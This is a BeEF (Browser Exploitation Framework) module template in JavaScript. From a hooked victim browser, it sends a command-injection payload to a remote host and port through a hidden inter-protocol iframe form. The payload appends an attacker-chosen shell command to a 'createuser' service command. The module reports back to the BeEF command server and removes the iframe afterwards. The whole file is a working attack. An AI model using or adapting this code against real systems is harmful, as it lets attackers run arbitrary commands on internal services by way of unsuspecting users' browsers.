//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

	var rhost   = '<%= @rhost %>'; 
	var rport   = '<%= @rport %>';
	var timeout = '<%= @timeout %>';

	// validate payload
	try {
		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
		var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
	} catch(e) {
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
		return;
	}

	// validate target details
	if (!rport || !rhost || isNaN(rport)) {
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
		return;
	}
	if (rport > 65535 || rport < 0) {
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
		return;
	}

	// send commands
	var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");

	// clean up
	cleanup = function() {
		document.body.removeChild(extract_iframe_<%= @command_id %>);
	}
	setTimeout("cleanup()", timeout*1000);

});